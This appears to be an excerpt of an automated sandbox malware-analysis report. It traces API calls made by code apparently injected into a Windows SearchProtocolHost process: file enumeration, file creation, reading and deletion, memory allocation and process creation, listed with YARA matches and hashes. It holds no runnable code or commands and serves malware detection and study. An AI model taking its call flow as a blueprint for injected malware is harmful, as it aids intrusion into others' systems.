2dab362 60941->60943 60942->60941 60945 2daa5b8 60944->60945 60946 2da5ad0 LdrInitializeThunk 60945->60946 60947 2daa6cf 60946->60947 60953 2daa819 
60947->60953 60966 2db4a00 60947->60966 60950 2daa80f 60951 2db4f60 NtClose 60950->60951 60951->60953 60952 2daa708 60954 2db4f60 NtClose 60952->60954 60953->60939 60955 2daa742 60954->60955 60955->60953 60956 2da5ad0 LdrInitializeThunk 60955->60956 60957 2daa7a1 60956->60957 60957->60953 60958 2db4a00 LdrInitializeThunk 60957->60958 60959 2daa7c6 60958->60959 60960 2daa7f9 60959->60960 60961 2daa7cd 60959->60961 60963 2db4f60 NtClose 60960->60963 60962 2db4f60 NtClose 60961->60962 60965 2daa7d7 60962->60965 60964 2daa803 60963->60964 60964->60939 60965->60939 60967 2db4a1d 60966->60967 60970 37d2b00 LdrInitializeThunk 60967->60970 60968 2daa6fd 60968->60950 60968->60952 60970->60968 60999 2db4dc0 61000 2db4dda 60999->61000 61003 37d2a10 LdrInitializeThunk 61000->61003 61001 2db4e16 61003->61001 61335 3812e9f 346 API calls 61337 2db03f2 NtClose LdrInitializeThunk 61424 37ac850 435 API calls 61048 2dafff1 61060 2db4e20 61048->61060 61050 2db0012 61051 2db0030 61050->61051 61052 2db0045 61050->61052 61053 2db4f60 NtClose 61051->61053 61054 2db4f60 NtClose 61052->61054 61055 2db0039 61053->61055 61057 2db004e 61054->61057 61056 2db007a 61057->61056 61058 2db6d80 RtlFreeHeap 61057->61058 61059 2db006e 61058->61059 61061 2db4e8f 61060->61061 61063 2db4e3e 61060->61063 61062 2db4ea5 NtReadFile 61061->61062 61062->61050 61063->61050 61339 3793640 13 API calls 61108 2da67e0 61109 2da6852 61108->61109 61110 2da67f8 61108->61110 61110->61109 61112 2daa120 61110->61112 61113 2daa146 61112->61113 61119 2daa513 61113->61119 61155 2db52f0 61113->61155 61115 2daa1eb 61116 2daa4fb 61115->61116 61118 2db7f90 2 API calls 61115->61118 61117 2db6d80 RtlFreeHeap 61116->61117 61117->61119 61120 2daa20a 61118->61120 61119->61109 61120->61116 61121 2daa313 61120->61121 61122 2db46a0 LdrInitializeThunk 61120->61122 61161 2da51e0 61121->61161 61123 2daa291 61122->61123 61123->61121 61128 2daa299 61123->61128 61126 2db6d80 RtlFreeHeap 61130 2daa309 61126->61130 61127 2daa2c8 61133 2db4f60 
NtClose 61127->61133 61128->61119 61128->61127 61134 2daa2d8 61128->61134 61158 2da50d0 61128->61158 61129 2daa373 61135 2daa4da 61129->61135 61136 2daa3a3 61129->61136 61130->61109 61132 2da50d0 LdrInitializeThunk 61132->61129 61133->61134 61134->61126 61138 2db6d80 RtlFreeHeap 61135->61138 61166 2db4ff0 61136->61166 61139 2daa4f1 61138->61139 61139->61109 61140 2daa3c2 61141 2da6f70 2 API calls 61140->61141 61142 2daa42b 61141->61142 61142->61116 61143 2daa436 61142->61143 61144 2db6d80 RtlFreeHeap 61143->61144 61145 2daa45a 61144->61145 61171 2db4900 61145->61171 61148 2db4840 LdrInitializeThunk 61149 2daa495 61148->61149 61150 2daa49c 61149->61150 61151 2db4900 LdrInitializeThunk 61149->61151 61150->61109 61152 2daa4c2 61151->61152 61175 2db44b0 61152->61175 61154 2daa4d0 61154->61109 61156 2db530a 61155->61156 61157 2db531b CreateProcessInternalW 61156->61157 61157->61115 61159 2db4840 LdrInitializeThunk 61158->61159 61160 2da510e 61159->61160 61160->61127 61162 2db46a0 LdrInitializeThunk 61161->61162 61163 2da5216 61162->61163 61164 2db4ff0 LdrInitializeThunk 61163->61164 61165 2da522b 61164->61165 61165->61116 61165->61129 61165->61132 61167 2db504f 61166->61167 61169 2db500e 61166->61169 61180 37d2da0 LdrInitializeThunk 61167->61180 61168 2db5080 61168->61140 61169->61140 61172 2db491d 61171->61172 61181 37d2c50 LdrInitializeThunk 61172->61181 61173 2daa46e 61173->61148 61176 2db4506 61175->61176 61177 2db44d1 61175->61177 61182 37d2ed0 LdrInitializeThunk 61176->61182 61177->61154 61178 2db452b 61178->61154 61180->61168 61181->61173 61182->61178 61183 2dae5e0 61184 2dae644 61183->61184 61185 2da59c0 2 API calls 61184->61185 61187 2dae76d 61185->61187 61186 2dae774 61187->61186 61188 2da5ad0 LdrInitializeThunk 61187->61188 61190 2dae7f0 61188->61190 61189 2dae913 61190->61189 61191 2dae922 61190->61191 61212 2dae3c0 61190->61212 61192 2db4f60 NtClose 61191->61192 61194 2dae92c 61192->61194 61195 2dae825 61195->61191 61196 2dae830 61195->61196 61197 2db6e60 
RtlAllocateHeap 61196->61197 61198 2dae859 61197->61198 61199 2dae878 61198->61199 61200 2dae862 61198->61200 61221 2dae2b0 CoInitialize 61199->61221 61201 2db4f60 NtClose 61200->61201 61203 2dae86c 61201->61203 61204 2dae886 61223 2db4ac0 61204->61223 61206 2dae902 61207 2db4f60 NtClose 61206->61207 61208 2dae90c 61207->61208 61209 2db6d80 RtlFreeHeap 61208->61209 61209->61189 61210 2dae8a4 61210->61206 61211 2db4ac0 LdrInitializeThunk 61210->61211 61211->61210 61213 2dae3dc 61212->61213 61214 2da3ec0 LdrLoadDll 61213->61214 61216 2dae3fa 61214->61216 61215 2dae403 61215->61195 61216->61215 61217 2da3ec0 LdrLoadDll 61216->61217 61218 2dae4ce 61217->61218 61219 2da3ec0 LdrLoadDll 61218->61219 61220 2dae528 61218->61220 61219->61220 61220->61195 61222 2dae315 61221->61222 61222->61204 61224 2db4ada 61223->61224 61227 37d2ac0 LdrInitializeThunk 61224->61227 61225 2db4b0a 61225->61210 61227->61225 61340 37bea40 323 API calls 61425 37bb839 15 API calls 61341 3787a30 307 API calls 60603 2d99990 60605 2d99e38 60603->60605 60604 2d9a2f2 60605->60604 60607 2db69f0 60605->60607 60608 2db6a16 60607->60608 60613 2da2df0 60608->60613 60610 2db6a35 60611 2db6a63 60610->60611 60616 2db32b0 60610->60616 60611->60604 60620 2da2d40 60613->60620 60615 2da2dfd 60615->60610 60617 2db330a 60616->60617 60618 2db3317 60617->60618 60644 2da1cb0 60617->60644 60618->60611 60621 2da2d57 60620->60621 60623 2da2d70 60621->60623 60624 2db58e0 60621->60624 60623->60615 60626 2db58f8 60624->60626 60625 2db591c 60625->60623 60626->60625 60631 2db46a0 60626->60631 60632 2db46ba 60631->60632 60638 37d2b2a 60632->60638 60633 2db46e6 60635 2db6d80 60633->60635 60641 2db5260 60635->60641 60637 2db598a 60637->60623 60639 37d2b3f LdrInitializeThunk 60638->60639 60640 37d2b31 60638->60640 60639->60633 60640->60633 60642 2db527a 60641->60642 60643 2db528b RtlFreeHeap 60642->60643 60643->60637 60645 2da1ce8 60644->60645 60656 2da6ee0 60645->60656 60647 2da1cf0 60648 2da1f49 60647->60648 60666 2db6e60 
60647->60666 60648->60618 60650 2da1d06 60651 2db6e60 RtlAllocateHeap 60650->60651 60652 2da1d17 60651->60652 60653 2db6e60 RtlAllocateHeap 60652->60653 60654 2da1d28 60653->60654 60669 2da17b0 60654->60669 60657 2da6f0c 60656->60657 60688 2da6dd0 60657->60688 60660 2da6f39 60662 2da6f44 60660->60662 60694 2db4f60 60660->60694 60661 2da6f51 60663 2da6f62 60661->60663 60665 2db4f60 NtClose 60661->60665 60662->60647 60663->60647 60665->60663 60702 2db5210 60666->60702 60668 2db6e7b 60668->60650 60705 2da71a0 60669->60705 60671 2da17ca 60681 2da1c98 60671->60681 60709 2dafe30 60671->60709 60674 2da19d1 60717 2db7f90 60674->60717 60676 2da1828 60676->60681 60712 2db7e60 60676->60712 60677 2da19e6 60684 2da19fc 60677->60684 60723 2d9ff90 60677->60723 60678 2d9ff90 3 API calls 60678->60684 60681->60648 60682 2da1ab3 60682->60684 60736 2da0250 60682->60736 60684->60678 60684->60681 60686 2da0250 LdrInitializeThunk 60684->60686 60739 2da7140 60684->60739 60685 2da7140 LdrInitializeThunk 60687 2da1b2a 60685->60687 60686->60684 60687->60684 60687->60685 60689 2da6ec6 60688->60689 60690 2da6dea 60688->60690 60689->60660 60689->60661 60697 2db4740 60690->60697 60693 2db4f60 NtClose 60693->60689 60695 2db4f7a 60694->60695 60696 2db4f8b NtClose 60695->60696 60696->60662 60698 2db475a 60697->60698 60701 37d34e0 LdrInitializeThunk 60698->60701 60699 2da6eba 60699->60693 60701->60699 60703 2db522a 60702->60703 60704 2db523b RtlAllocateHeap 60703->60704 60704->60668 60706 2da71ad 60705->60706 60707 2da71ce SetErrorMode 60706->60707 60708 2da71d5 60706->60708 60707->60708 60708->60671 60743 2db6cf0 60709->60743 60711 2dafe51 60711->60676 60713 2db7e70 60712->60713 60714 2db7e76 60712->60714 60713->60674 60715 2db6e60 RtlAllocateHeap 60714->60715 60716 2db7e9c 60715->60716 60716->60674 60718 2db7f00 60717->60718 60719 2db7f5d 60718->60719 60720 2db6e60 RtlAllocateHeap 60718->60720 60719->60677 60721 2db7f3a 60720->60721 60722 2db6d80 RtlFreeHeap 60721->60722 60722->60719 60724 2d9ff9b 
60723->60724 60725 2d9ffa0 60723->60725 60724->60682 60726 2db6cf0 NtAllocateVirtualMemory 60725->60726 60733 2d9ffc5 60726->60733 60727 2da002c 60727->60682 60729 2da0032 60730 2da005c 60729->60730 60732 2db5180 LdrInitializeThunk 60729->60732 60730->60682 60734 2da004d 60732->60734 60733->60727 60733->60729 60735 2db6cf0 NtAllocateVirtualMemory 60733->60735 60750 2db4650 60733->60750 60754 2db5180 60733->60754 60734->60682 60735->60733 60737 2db5180 LdrInitializeThunk 60736->60737 60738 2da0272 60737->60738 60738->60687 60740 2da7153 60739->60740 60760 2db45d0 60740->60760 60742 2da717e 60742->60684 60746 2db5090 60743->60746 60745 2db6d21 60745->60711 60747 2db50f3 60746->60747 60749 2db50ae 60746->60749 60748 2db5109 NtAllocateVirtualMemory 60747->60748 60748->60745 60749->60745 60751 2db466d 60750->60751 60758 37d2d10 LdrInitializeThunk 60751->60758 60752 2db4695 60752->60733 60755 2db519a 60754->60755 60759 37d2b90 LdrInitializeThunk 60755->60759 60756 2db51c2 60756->60733 60758->60752 60759->60756 60761 2db45ee 60760->60761 60762 2db4623 60760->60762 60761->60742 60765 37d2cf0 LdrInitializeThunk 60762->60765 60763 2db4648 60763->60742 60765->60763 61346 37c7a33 573 API calls 61427 378b420 203 API calls 61428 3792022 209 API calls 61350 378821b 318 API calls 61009 2dae3bc LdrLoadDll 61351 3789610 409 API calls 61429 3792410 449 API calls 61430 3799810 550 API calls 61064 2db43b0 61065 2db43bf 61064->61065 61066 2db43ce 61065->61066 61069 37d4260 LdrInitializeThunk 61065->61069 61067 2db4428 61069->61067 61431 378ec0b 443 API calls 61432 378640d 462 API calls 61107 2db43ac LdrInitializeThunk 61355 37bd600 557 API calls 61356 382d60a 329 API calls 60770 2da5150 60771 2da7140 LdrInitializeThunk 60770->60771 60772 2da5180 60771->60772 60774 2da51ac 60772->60774 60775 2da70c0 60772->60775 60776 2da7104 60775->60776 60781 2da7125 60776->60781 60782 2db4430 60776->60782 60778 2da7115 60779 2da7131 60778->60779 60780 2db4f60 NtClose 60778->60780 60779->60772 
60780->60781 60781->60772 60783 2db4486 60782->60783 60785 2db4451 60782->60785 60787 37d4570 LdrInitializeThunk 60783->60787 60784 2db44ab 60784->60778 60785->60778 60787->60784 61433 37bacf0 305 API calls 61434 37bccf0 GetPEB GetPEB 61357 37c62f0 461 API calls 61359 37c76ed 303 API calls 61360 37872e0 295 API calls 61437 37958e0 645 API calls 60971 2dae940 60974 2dad5c0 60971->60974 60975 2dad5e6 60974->60975 60976 2da7390 GetFileAttributesW 60975->60976 60977 2dad761 60976->60977 60978 2dad768 60977->60978 60980 2dad2a0 60977->60980 60981 2dad2c3 60980->60981 60982 2db1af0 3 API calls 60981->60982 60984 2dad2d0 60982->60984 60983 2dad325 60983->60977 60984->60983 60985 2dad2ef 60984->60985 60991 2dad331 60984->60991 60986 2dad2f7 60985->60986 60987 2dad314 60985->60987 60988 2db6d80 RtlFreeHeap 60986->60988 60989 2db6d80 RtlFreeHeap 60987->60989 60990 2dad308 60988->60990 60989->60983 60990->60977 60992 2dac5e0 RtlFreeHeap 60991->60992 60995 2dad375 60992->60995 60993 2db6d80 RtlFreeHeap 60994 2dad583 60993->60994 60994->60977 60995->60993 61361 37b66e0 396 API calls 61363 3799ae4 402 API calls 61440 37bf4d0 308 API calls 61442 378b0c0 382 API calls 61364 3793ec0 398 API calls 61228 2dac160 61229 2dac182 61228->61229 61253 2dac020 61229->61253 61232 2dac020 3 API calls 61233 2dac422 61232->61233 61234 2dac020 3 API calls 61233->61234 61235 2dac43a 61234->61235 61236 2dac020 3 API calls 61235->61236 61237 2dac452 61236->61237 61238 2dac020 3 API calls 61237->61238 61239 2dac46d 61238->61239 61240 2dac020 3 API calls 61239->61240 61242 2dac485 61240->61242 61241 2dac49f 61242->61241 61243 2dac020 3 API calls 61242->61243 61244 2dac4d3 61243->61244 61245 2dac020 3 API calls 61244->61245 61246 2dac510 61245->61246 61247 2dac020 3 API calls 61246->61247 61248 2dac54d 61247->61248 61249 2dac020 3 API calls 61248->61249 61250 2dac58a 61249->61250 61251 2dac020 3 API calls 61250->61251 61252 2dac5c7 61251->61252 61255 2dac049 61253->61255 61254 2dac14d 61254->61232 
61255->61254 61256 2dac0f3 FindFirstFileW 61255->61256 61256->61254 61258 2dac10e 61256->61258 61257 2dac134 FindNextFileW 61257->61258 61259 2dac146 FindClose 61257->61259 61258->61257 61259->61254 61365 37c32c0 301 API calls 61443 37ca8c0 13 API calls 61444 37c6cc0 302 API calls 61366 3791eb0 21 API calls 60788 2da8911 60790 2da8920 60788->60790 60789 2da8927 60790->60789 60791 2da8a0f GetFileAttributesW 60790->60791 60792 2da8bba 60790->60792 60796 2dac5e0 60790->60796 60791->60790 60793 2da8bd3 60792->60793 60794 2db6d80 RtlFreeHeap 60792->60794 60794->60793 60798 2dac5f6 60796->60798 60797 2dac603 60797->60790 60798->60797 60799 2db6d80 RtlFreeHeap 60798->60799 60800 2dac63c 60799->60800 60800->60790 61367 378bea0 306 API calls 61368 37906a0 314 API calls 61445 37900a0 470 API calls 61446 378e0a4 317 API calls 61372 378a290 509 API calls 61373 378fe90 20 API calls 61447 378c090 301 API calls 61015 2d99930 61016 2d9993f 61015->61016 61017 2d99980 61016->61017 61018 2d9996d CreateThread 61016->61018 61374 379c690 GetPEB 61070 2db4330 61071 2db4383 61070->61071 61072 2db434e 61070->61072 61075 37d38d0 LdrInitializeThunk 61071->61075 61073 2db43a8 61075->61073 61449 37cb890 336 API calls
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 02DAC104
                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02DAC13F
                                                                                      • FindClose.KERNELBASE(00000000), ref: 02DAC14A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID:
                                                                                      • API String ID: 3541575487-0
                                                                                      • Opcode ID: 09787ccadf1e063e03c2a338d6c6c0ff02a4b0c240061e834ff56549c24e52a0
                                                                                      • Instruction ID: a74a6e14f9cf81df537b02f999820d51edb061e570d2da65b780cf64c3c8cc0e
                                                                                      • Opcode Fuzzy Hash: 09787ccadf1e063e03c2a338d6c6c0ff02a4b0c240061e834ff56549c24e52a0
                                                                                      • Instruction Fuzzy Hash: 943192B1600208BBEB20EF64CC85FEF777DEF54759F144459B509A6280DB70AE85CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02DB4DAE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 48a2d5c0d9baaec19eb4391d944b8839d7e61867b67e2b325b44252245e4c306
                                                                                      • Instruction ID: bfd19e977789c79dab25d712b4a9c0869e13317ce687c709a35e3ae5686d32c4
                                                                                      • Opcode Fuzzy Hash: 48a2d5c0d9baaec19eb4391d944b8839d7e61867b67e2b325b44252245e4c306
                                                                                      • Instruction Fuzzy Hash: 6F219DB2210549BBDB54DE99DC90EEB73AEEF8C754F108208FA5D97244D630EC51CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02DB4ECE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: 48a771d879941eeb3c9e92751a85959e64d1bd68007c7e994aed96b2676d3dba
                                                                                      • Instruction ID: bd362fc04d0a2de8961575bb06ae986fa2bcb59a38748a854f38627f8dadce09
                                                                                      • Opcode Fuzzy Hash: 48a771d879941eeb3c9e92751a85959e64d1bd68007c7e994aed96b2676d3dba
                                                                                      • Instruction Fuzzy Hash: B021D0B2200149AFDB04DE99DC80EEB73AEEF8D714F008209FA1DA7241D630AC118BB4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtAllocateVirtualMemory.NTDLL(02DA1828,?,02DA1F49,00000000,00000004,00003000,00000004,00000000,02DA1F49,?,02DA1828,02DA1F49,?), ref: 02DB5126
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateMemoryVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2167126740-0
                                                                                      • Opcode ID: ac2dac4fe1bf38f14005ee0cbbc6b957ab02f6000370c02d97857d4059162476
                                                                                      • Instruction ID: b36cb84d7400a3d9928c027ad73f0bb9cb2a694b1222453b0fd6ab6fede65cc2
                                                                                      • Opcode Fuzzy Hash: ac2dac4fe1bf38f14005ee0cbbc6b957ab02f6000370c02d97857d4059162476
                                                                                      • Instruction Fuzzy Hash: 461104B2200649ABDB10DE99DC80EEB73ADEF89710F008509FA5997240D630AC11CBB5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      • Opcode ID: b31cb9b57c14b65b8104b11016f728e859331c2066ba905329b858184d5dfd44
                                                                                      • Instruction ID: c5290a9af76561f661c29922c1dc0ad73c35c9fd92991ab4dfcf512ea599fafe
                                                                                      • Opcode Fuzzy Hash: b31cb9b57c14b65b8104b11016f728e859331c2066ba905329b858184d5dfd44
                                                                                      • Instruction Fuzzy Hash: A0018171201244BBD611E665DC44FEBB79DEFCAB14F408409FA4D5B241DB31BD118BB5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02DB4F94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID:
                                                                                      • API String ID: 3535843008-0
                                                                                      • Opcode ID: c779744041bb04ee28eeb504ce302c9315f428dc0334e15b79c7bac853b9737f
                                                                                      • Instruction ID: b10ae9ce60f22beebedac40af9c546ad3a7ce94fcf46d5d9182d24f9913a636e
                                                                                      • Opcode Fuzzy Hash: c779744041bb04ee28eeb504ce302c9315f428dc0334e15b79c7bac853b9737f
                                                                                      • Instruction Fuzzy Hash: 36E086362406087BD611EA59DC01FDB77ADDFC5B10F404015FA4C67281CA71B9018BF1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 75e10a39a5019e25534cc4cba9dff139be6bcb549d0fae6b1b27ca44ed135310
                                                                                      • Instruction ID: fc698c6cd2efc4dcfa64a4faae2153906bb274a2e8651af8f8245b4ef5f90f3d
                                                                                      • Opcode Fuzzy Hash: 75e10a39a5019e25534cc4cba9dff139be6bcb549d0fae6b1b27ca44ed135310
                                                                                      • Instruction Fuzzy Hash: 55900261611104529540B2584904406600597E5701391C629A4544560CC7288855B26A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 0c01ae893d4d096f425289620d443b7ad715fbcbc03c341d9ec8be5ed29014e9
                                                                                      • Instruction ID: add9bcd7942a2290f9aea132c0b60989a8a77c7da122a2b6057e0f4945df3c5a
                                                                                      • Opcode Fuzzy Hash: 0c01ae893d4d096f425289620d443b7ad715fbcbc03c341d9ec8be5ed29014e9
                                                                                      • Instruction Fuzzy Hash: F690023161510812E500A2584614706100587D4601F61C925A4414568DC7A5895175A3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: c30cd5fe3a9fd27856cfa3b7ec3f8d6aeb6d9b73f47139202006ce5f41c11b00
                                                                                      • Instruction ID: 7b3710f3ccfabdeab605289b51bbc1ba6ca196b53d16f74c6d62c833d87f287f
                                                                                      • Opcode Fuzzy Hash: c30cd5fe3a9fd27856cfa3b7ec3f8d6aeb6d9b73f47139202006ce5f41c11b00
                                                                                      • Instruction Fuzzy Hash: 3990023121100C12E580B258450464A000587D5701F91C529A4015654DCB258A5977A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: da5672ed3e2acedb5658448ad9afa74b8c291f7df66a800a9c60ae14b3c92deb
                                                                                      • Instruction ID: 85d001d2d1cc7aac80766ae0c26af49999cc1fa35d9c1f97e4fcc78cf67f6b75
                                                                                      • Opcode Fuzzy Hash: da5672ed3e2acedb5658448ad9afa74b8c291f7df66a800a9c60ae14b3c92deb
                                                                                      • Instruction Fuzzy Hash: 0890023121504C52E540B2584504A46001587D4705F51C525A4054694DD7358D55B662
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: b87dc4792086d1a011be13b27c2992ffa101693689481fa0dcd33697b9f59df6
                                                                                      • Instruction ID: bd2285a184268f37f2b997b79aade63bc7179b1e877d4a3a7fa76f15e943bb1e
                                                                                      • Opcode Fuzzy Hash: b87dc4792086d1a011be13b27c2992ffa101693689481fa0dcd33697b9f59df6
                                                                                      • Instruction Fuzzy Hash: 4D90023121100812E500A6985508646000587E4701F51D525A9014555EC77588917132
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 67ad43825e178d74d6e02c356fa18835621ba4c756555b5f213bd28b5d377db9
                                                                                      • Instruction ID: 78008b89da53977bb7439ff878dae7e0fc3434411e8e804f77c4d09ccab57e9d
                                                                                      • Opcode Fuzzy Hash: 67ad43825e178d74d6e02c356fa18835621ba4c756555b5f213bd28b5d377db9
                                                                                      • Instruction Fuzzy Hash: 8890023121108C12E510A258850474A000587D4701F55C925A8414658DC7A588917122
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
